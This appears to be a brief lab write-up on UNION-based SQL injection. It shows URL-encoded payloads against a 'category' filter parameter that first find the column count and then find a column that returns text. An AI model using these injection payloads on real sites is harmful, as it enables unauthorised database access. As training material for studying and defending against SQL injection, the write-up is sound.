SQLi: UNION, Finding a Column Containing Text

First, find the number of columns required.

Here's a working payload that demonstrates that the UNION needs three columns:

• /filter?category=Gifts%27%20union%20select%20null,null,null--

Then try the canary string in each position until it returns:

• /filter?category=Gifts%27%20union%20select%20null,%270r4LBs%27,null--: